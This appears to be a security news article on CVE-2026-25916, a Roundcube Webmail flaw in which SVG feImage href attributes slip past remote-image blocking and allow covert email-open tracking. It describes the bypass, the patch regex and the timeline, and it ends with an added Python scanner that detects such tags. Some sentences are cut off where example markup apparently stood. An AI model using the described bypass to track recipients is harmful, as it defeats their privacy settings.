Even when "Block remote images" is enabled, a Roundcube Webmail vulnerability exposes users to covert tracking, circumventing email security measures. This problem (CVE-2026-25916), which was found during holiday tinkering, impacts versions prior to 1.5.13 and 1.6.13. Without your knowledge, attackers can now verify whether you have opened their emails by recording your IP address and browser information.
The Issue in Simple Terms

The HTML sanitizer from Roundcube functions similarly to a club bouncer. The href attribute of the SVG feImage element is interpreted as a harmless link rather than as something that pulls in remote images for filters. The sanitizer routes it through wash_link(), which supports HTTP/HTTPS URLs. Outcome? Bypassing the block, browsers stealthily retrieve the attacker's image.

While auditing recent SVG fixes in Roundcube's rcube_washtml.php, security researcher "nullcathedral" discovered this. Since but avoids the image checks, it stood out as one of the many SVG bugs that frequently hint at more.

How Attackers Take Advantage of It

Picture getting this malicious HTML in an email:

It is a small SVG that is off-screen. The browser pings the attacker's server by grabbing the href image when it is rendered.
Simply opening the email initiates it; no click is necessary. Ideal for tracking spam or phishing campaigns.

Details of CVE

Field               Value
CVE                 CVE-2026-25916
Vendor              Roundcube
Product             Roundcube Webmail
Affected versions   <1.5.13 and <1.6.13
Date of disclosure  2026-02-08

It was quickly patched by developers. The update uses a regex to modify is_image_attribute(): ($attr == 'href' && preg_match('/^(feimage|image|use)$/i', $tag)). Like other images,

2026-01-04: Roundcube was notified.
2026-02-08: Versions 1.5.13 and 1.6.13 were released.
2026-02-09: CVE assigned.

Email tracking helps targeted attacks by circumventing privacy settings.

Webmail administrators: Update right away. Users: Examine senders and enable image blocking. This demonstrates how specialized SVG peculiarities can compromise general defenses.
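
For administrators who want to check stored or inbound messages for this pattern, the following added example (not from the original article and not Roundcube's code) scans an HTML body for the tag names in the fix's regex (feimage, image, use) carrying an http(s) href. The class, function and sample names are hypothetical, and the sample bodies are constructed.

```python
import re
from html.parser import HTMLParser

# Tag names copied from the regex in the fix quoted above.
IMAGE_LIKE_TAGS = re.compile(r"^(feimage|image|use)$", re.I)
# wash_link() is described above as supporting HTTP/HTTPS URLs, so flag those.
REMOTE_URL = re.compile(r"^\s*https?://", re.I)


class RemoteSvgHrefFinder(HTMLParser):  # hypothetical helper name
    """Collect (tag, url) pairs where an image-like SVG tag has a remote href."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names (<feImage> -> "feimage").
        # Self-closing tags are also delivered here by the default handler.
        if not IMAGE_LIKE_TAGS.match(tag):
            return
        for name, value in attrs:
            if name == "href" and value and REMOTE_URL.match(value):
                self.hits.append((tag, value.strip()))


def find_remote_svg_hrefs(html_body):
    """Return every remote href found on feimage/image/use in one HTML body."""
    finder = RemoteSvgHrefFinder()
    finder.feed(html_body)
    finder.close()
    return finder.hits


# Constructed sample bodies (not from the article); example.invalid never resolves.
SAMPLES = {
    "newsletter": '<p>Hi</p><a href="https://example.invalid/unsub">Unsubscribe</a>',
    "local-icon": '<svg><defs><g id="i"/></defs><use href="#i"/></svg>',
    "remote-feimage": '<svg><filter id="f">'
                      '<feImage href="https://example.invalid/o.png"/></filter></svg>',
    "mixed-case": '<svg><IMAGE HREF=" HTTPS://example.invalid/a.png"></svg>',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, find_remote_svg_hrefs(body))
```

A hit means the message references a remote resource from one of these tags; ordinary links and local fragment references are not reported.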

